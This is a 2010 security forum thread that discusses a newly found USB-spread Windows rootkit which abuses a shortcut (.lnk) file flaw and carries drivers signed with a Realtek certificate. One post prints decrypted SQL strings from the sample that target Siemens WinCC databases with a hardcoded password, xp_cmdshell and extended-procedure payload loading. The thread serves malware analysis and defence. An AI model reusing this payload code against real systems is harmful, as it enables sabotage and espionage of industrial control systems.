Discussion in 'malware problems & news' started by sergey ulasen, Jul 12, 2010.

Thread Status:
Not open for further replies.
  1. sergey ulasen

    sergey ulasen AV Expert

    Modules of current malware were first time detected by "VirusBlokAda" ( company specialists on the 17th of June, 2010 and were added to the anti-virus bases as Trojan-Spy.0485 and Malware-Cryptor.Win32.Inject.gen.2. During the analysis of malware there was revealed that it uses USB storage device for propagation.

    You should take into consideration that virus infects Operation System in unusual way through vulnerability in processing lnk-files (without usage of autorun.inf file).

    So you just have to open infected USB storage device using Microsoft Explorer or any other file manager which can display icons (for i.e. Total Commander) to infect your Operating System and allow execution of the malware.

    Malware installs two drivers: mrxnet.sys and mrxcls.sys. They are used to inject code into systems processes and hide malware itself. That's the reason why you can't see malware files on the infected USB storage device. We have added those drivers to anti-virus bases as Rootkit.TmpHider and SScope.Rookit.TmpHider.2. Note that both drivers are signed with digital signature of Realtek Semiconductor Corp. (

    Thus, current malware should be added to very dangerous category causes the risk of the virus epidemic at the current moment.

    After we have added a new recordes to the anti-virus bases we are admitting a lot of detections of Rootkit.TmpHider and SScope.Rookit.TmpHider.2 all over the world.

  2. CloneRanger

    CloneRanger Registered Member

    @sergey ulasen

    Thanks for posting :thumb:

    Fascinating, and potentially deadly to many out there, by the sound of it :eek:

    This would appear to circumvent USB autorun blockers. I expect that AntiExe etc programs like ProcessGuard etc, would block the .SYS etc from installing ? As not many people do not have such programs, i suppose unless their AV's etc have the Defs, they are vulnerable :(

    Please keep us updated on this :thumb:
  3. AvinashR

    AvinashR Registered Member

    I am sure Tight SRP or AppLocker policy will defeat the execution of this malware.

    Remember, if it cannot execute, it cannot infect.
  4. CloneRanger

    CloneRanger Registered Member

    Originally Posted by AvinashR

    Quite possibly, Sully etc should know ;)

    Yes and no :D ~Comments removed~
    Last edited by a moderator: Jul 12, 2010
  5. CloneRanger

    CloneRanger Registered Member

    Another disturbing feature is they are signed with digital signatures of the Realtek Semiconductor Corp :(

    These must be either fake, or manipulated real ones ? Things like this were said to be Impossible, by so called "experts more than once in the last few years :rolleyes:
  6. Windchild

    Windchild Registered Member

    A shame there's so little information here. It doesn't sound like the average malware-du-jour. Isn't there any more information on the vulnerability in processing shortcut .LNK files?

    I don't recall any expert saying "this" was impossible. It's always been possible to steal a legit certificate, if whoever owns that cert has lax enough security. It's possible to slap any cert on a file and at a glance it may look legit, but won't actually check out as valid if one bothers to check. There are possibilities like this - there's always even the option of fooling the certificate authority into issueing you a certificate that should belong to someone else (you're not Mozilla Corporation, but some CA might still give you a certificate with that name on it). In this particular case, there's not much information to go on to tell what's actually happened.
  7. CloneRanger

    CloneRanger Registered Member

    I was sure i did, so i went and searched. Here's several examples i found.

    Even though this article is on PGP i think it's aplicable.

    As i was searching for those conformation links, i also found an interesting article which explains the multiple weaknesses in 1st gen certs, and goes on to show how they can be improved :thumb:

  8. Windchild

    Windchild Registered Member

    There seems to be some confusion here, due to the vagueness of some statements. None of those comments you quoted claims that it's impossible to have a (valid) digital signature on a malicious file. There's plenty of ways for that: for example, one could steal a cert from some innocent developer and then use it to sign malware. There's even more ways to get an invalid digital signature on a malware: for example, just copying it from some signed file. What those comments you quoted are saying is that it's not mathematically feasible to create a "fake" digital signature that also checks out as valid in someone else's name. When "so called experts" claim digital signatures can't be faked, they're referring to this mathematical difficulty of creating a fake signature that actually checks out as valid. They're not saying you can't steal a cert from someone, or fool a certificate authority into granting you someone else's cert, or such things.

    As far as the malware mentioned by the original poster is concerned, there is no information given that would tell us how the Realtek digital signature got on the malicious files. Was a legit Realtek cert stolen? Or is it just a case of copying the cert onto a malware binary, in which case the signature would check out as invalid? Or is it really a case where someone has successfully created a fake cert that checks out as valid, in spite of the mathematical difficulty of this? With the scarce information given here, it's impossible to tell, but the latter is very unlikely. Sure, there's the option of exploiting MD5 collisions, but even though that's theoretically possible, it's not exactly easy, and it's not like you have to use MD5 anyway. What I'm saying here is that the information given in this thread gives us no reason to suspect those "experts" were wrong about the mathematical infeasibility of creating fake digital signatures.

    There's a good reason for wanting more information on this case. When so little info is given, it's very difficult to say anything useful about the case. It would be nice to know more details on the .LNK file vulnerability, for example, and details on the digital signature on the malicious files, and many other factors. When one leaves such information out, it feels kind of like a movie teaser trailer - all the good stuff is missing. :D
  9. CloneRanger

    CloneRanger Registered Member

    I've asked sergey ulasen to keep us updated, so hopefully he will include this aspect too :thumb:
  10. yankinNcrankin

    yankinNcrankin Registered Member

    Why create when it can be bought.....people in position(s) have been known to sell out.....:blink:
  11. AvinashR

    AvinashR Registered Member

    I haven't received any kind of information from other vendors too, Hope Sergey Ulasen keep us updatedon this topic...
  12. sergey ulasen

    sergey ulasen AV Expert

    Additional information about malware is in document:

    View attachment new_rootkit_en.pdf
  13. AvinashR

    AvinashR Registered Member

    Thanks for additional document...
  14. Windchild

    Windchild Registered Member

    Thanks for that :thumb: There's still some questions about the .LNK file vulnerability worth asking, though. Such as: Has the vulnerability been reported to Microsoft? And most importantly the nature of the vulnerability. I assume it leads to arbitrary code execution with the privileges of explorer.exe (the privileges of currently logged-in user, that is to say)? If that is so, then the malware wouldn't be able to infect a system unless the user was logged in as an administrator. It would be nice for such details to be mentioned, seeing how it has a great effect on how dangerous the vulnerability is, especially considering that new Windows versions come with UAC enabled by default.

    Indeed. Most everyone has a price, and in larger companies it isn't even all that unusual to have a rogue-ish employee. Of course, the problem is in the risk of getting caught.
  15. CloneRanger

    CloneRanger Registered Member

    Good work Ulasen Sergey and Kupreev Oleg :thumb:

    Quotes from the PDF

    Amazing, there's always something for the bad guys to keep them busy and find, and they sure do, and make use of them.

    Unbelievable you havn't heard back from Realtek :eek:

    Vendors have known for several years that numerous fake etc certs have accompanied malware. So they havn't had any excuse for ignoring this vector :(

    Nice to see Gmer still on the ball :thumb:

    Re - oem6c.pnf and oem7a.pnf

    Could this be partially a new Graphics vulnerabilty exploit ? similar in "some" way/s to the MetaFiles exploits
  16. Windchild

    Windchild Registered Member

    No, I don't see how it could. According to Sergey's PDF, the malware infects the system by exploiting an unpatched vulnerability in processing LNK files. There is no mention of any other vulnerability being exploited. Those .pnf files are not graphic files - as stated in the PDF, they're encrypted. They probably contain things like the malware's configuration data.
  17. wat0114

    wat0114 Guest

    The questions I have are:

    1. what is the Windows vulnerability?
    2. How do the files get from the usb stick to the directories, especially in a standard account?
    3. how do the malicious files execute?
    4. would a whitelist or other anti-executable measure stop this?
  18. CloneRanger

    CloneRanger Registered Member

    oem6c.pnf and oem7a.pnf listed in here -

    Malware-Cryptor.Win32.Inject.gen.2 - Inject.gen.2 "might" be connected with the Bifrost Trojan ? -

    MRXCLS - MRXNET - mrxcls.sys -

    Those same 3 files in this ComboFix log Files Created on 2010-07-04 -

    Also here -



    Re - oem6c.pnf and oem7a.pnf

    OK, the .PNF extension must just be a coincidence then !
  19. Meriadoc

    Meriadoc Registered Member

    Thanks Sergey for analysis.

    Files put in root of vm, detection by arks

    Attached Files:

    Last edited: Jul 14, 2010
  20. sergey ulasen

    sergey ulasen AV Expert

    We wrote an e-mail to Microsoft, but they haven't answered us.
    I think most of the antivirus vendors have paid attention to this virus and I hope that they report Microsoft and Realtek about problem too.
  21. Meriadoc

    Meriadoc Registered Member

    thanks EP

    Attached Files:

    Last edited: Jul 14, 2010
  22. frank_boldewin

    frank_boldewin Registered Member

    hi guys,

    has anyone already taken a deeper look at the malware?

    i found stuff like this after some decryption/unpacking stages of MD5 sample 016169ebebf1cec2aad6c7f0d0ee9026

    use [%s]
    declare @t varchar(4000), @e int, @f int if exists (select text from dbo.syscomments where id=object_id(N'[dbo].[MCPVREADVARPERCON]')) select @t=rtrim(text) from dbo.syscomments c, dbo.sysobjects o where = and = object_id(N'[dbo].[MCPVREADVARPERCON]') set @e=charindex(',openrowset',@t) if @e=0 set @t=right(@t,len(@t)-7) else begin set @f=charindex('sp_msforeachdb',@t) if @f=0 begin set @t=left(@t,@e-1) set @t=right(@t,len(@t)-7)  end else select * from fail_in_order_to_return_false end set @t='alter '+@t+',openrowset(''SQLOLEDB'',''Server=.\WinCC;uid=WinCCConnect;pwd=2WSXcder'',''select 0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set @z=''''use [?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=''''''''--CC-S''''''''+char(80);if left(db_name(),2)=''''''''CC'''''''' select @t=substring(text,charindex(@s,text)+8,charindex(''''''''--*'''''''',text)-charindex(@s,text)-8) from syscomments where text like (''''''''%''''''''+@s+''''''''%'''''''');if @t is not NULL exec(@t)'''';exec sp_msforeachdb @z'')' exec (@t) 
    declare @t varchar(4000), @e int, @f int if exists (select * from dbo.syscomments where id=object_id(N'[dbo].[MCPVPROJECT2]')) select @t=rtrim(c.text) from dbo.syscomments c, dbo.sysobjects o     where = and = object_id(N'[dbo].[MCPVPROJECT2]') order by c.number, c.colid  set @e=charindex('--CC-SP',@t)  if @e=0  begin set @f=charindex('where',@t) if @f<>0 set @t=left(@t,@f-1) set @t=right(@t,len(@t)-6)  end else  select * from fail_in_order_to_return_false  set @t='alter '+@t+' where ((SELECT top 1 1 FROM MCPVREADVARPERCON)=''1'') --CC-SP use master;declare @t varchar(999),@s varchar(999),@a int declare r cursor for select filename from master..sysdatabases where (name like ''CC%'') open r fetch next from r into @t while (@@fetch_status<>-1) begin set @t=left(@t,len(@t)-charindex(''\'',reverse(@t)))+''\GraCS\cc_tlg7.sav'';exec master..xp_fileexist @t,@a out;if @a=1 begin set @s = ''master..xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t = @t+''x'';dbcc addextendedproc(sp_payload,@t);exec master..sp_payload;exec master..sp_dropextendedproc sp_payload;break; end fetch next from r into @t end close r deallocate r --*' exec (@t)  
    use master
    select name from master..sysdatabases where filename like N'%s'
    exec master..sp_attach_db 'wincc_svr',N'%s',N'%s'
    exec master..sp_detach_db 'wincc_svr'
    use wincc_svr
    SOFTWARE\Microsoft\Windows\CurrentVersion\MS-DOS Emulation
     DECLARE @vr varchar(256) SET @vr = CONVERT(varchar(256), (SELECT serverproperty('productversion') )) IF @vr > '9' BEGIN
    EXEC sp_configure 'show advanced options', 1  RECONFIGURE WITH OVERRIDE
    EXEC sp_configure 'Ole Automation Procedures', 1
     DECLARE @ashl int,         @aind varchar(260),         @ainf varchar(260),         @hr int EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT IF @hr <> 0 GOTO endq EXEC sp_OAMethod @ashl, 'ExpandEnvironmentStrings',                 @aind OUT, '%%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi'  DECLARE @aods int, 
           @adss int, 
           @aip int, 
           @abf varbinary(4096) EXEC @hr = sp_OACreate 'ADODB.Stream', @aods OUT IF @hr <> 0 GOTO endq EXEC @hr = sp_OASetProperty @aods, 'Type', 1 IF @hr <> 0 GOTO endq EXEC @hr = sp_OAMethod @aods, 'Open', null IF @hr <> 0 GOTO endq SET @adss = ( SELECT DATALENGTH(abin) FROM sysbinlog ) SET @aip = 1 WHILE ( @aip <= @adss )  BEGIN  SET @abf = ( SELECT SUBSTRING (abin, @aip, 4096 ) FROM sysbinlog )  EXEC @hr = sp_OAMethod @aods, 'Write', null, @abf  IF @hr <> 0 GOTO endq   SET @aip = @aip + 4096  END EXEC @hr = sp_OAMethod @aods, 'SaveToFile', null, @ainf, 2 IF @hr <> 0 GOTO endq  EXEC sp_OAMethod @aods, 'Close', null endq: 
      EXEC sp_dropextendedproc sp_dumpdbilog 
     DECLARE @ashl int,         @aind varchar(260),         @ainf varchar(260),         @hr int EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT IF @hr <> 0 GOTO endq EXEC sp_OAMethod @ashl, 'ExpandEnvironmentStrings',                 @aind OUT, '%%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi'   EXEC sp_addextendedproc sp_dumpdbilog, @ainf  EXEC sp_dumpdbilog   EXEC sp_dropextendedproc sp_dumpdbilog  endq: 
     DECLARE @ashl int,         @aind varchar(260),         @ainf varchar(260),         @hr int EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT IF @hr <> 0 GOTO endq EXEC sp_OAMethod @ashl, 'ExpandEnvironmentStrings',                 @aind OUT, '%%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi'  DECLARE @fs int  EXEC @hr = sp_OACreate 'Scripting.FileSystemObject', @fs OUT IF @hr <> 0 GOTO endq EXECUTE sp_OAMethod @fs, 'DeleteFile', NULL, @ainf endq: 
     DROP TABLE sysbinlog
     CREATE TABLE sysbinlog ( abin image ) INSERT INTO sysbinlog VALUES(0x
    .xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t = @t+''x'';dbcc addextendedproc(sp_run,@t);exec master..sp_run;')      
     0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set @z=''use [?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=''''--CC-S''''+char(80);if left(db_name(),2)=''''CC'''' select @t=substring(text,charindex(@s,text)+8,charindex(''''--*'''',text)-charindex(@s,text)-8) from syscomments where text like (''''%''''+@s+''''%'''');if @t is not NULL exec(@t)'';exec sp_msforeachdb @z')
    this points me to the Siemens WinCC SCADA system.
    looks like this malware was made for espionage.
  23. WawaSeb

    WawaSeb Registered Member

    Hello everybody,

    *** Thank both Ulasen Sergey and Kupreev Oleg for this work ! ***

    ComboFix (by sUBs) and MBAM are already able to remove the infection.

    I'm looking forward to test it with KIS 2011.
    ==> Edit : KIS 2011 successfully prvent the infection

    Best regards,
    Last edited: Jul 15, 2010
  24. Meriadoc

    Meriadoc Registered Member

    Mm, what other reason for targeting WinCC Scada system.
    Last edited: Jul 15, 2010
  25. Searching_ _ _

    Searching_ _ _ Registered Member

Thread Status:
Not open for further replies.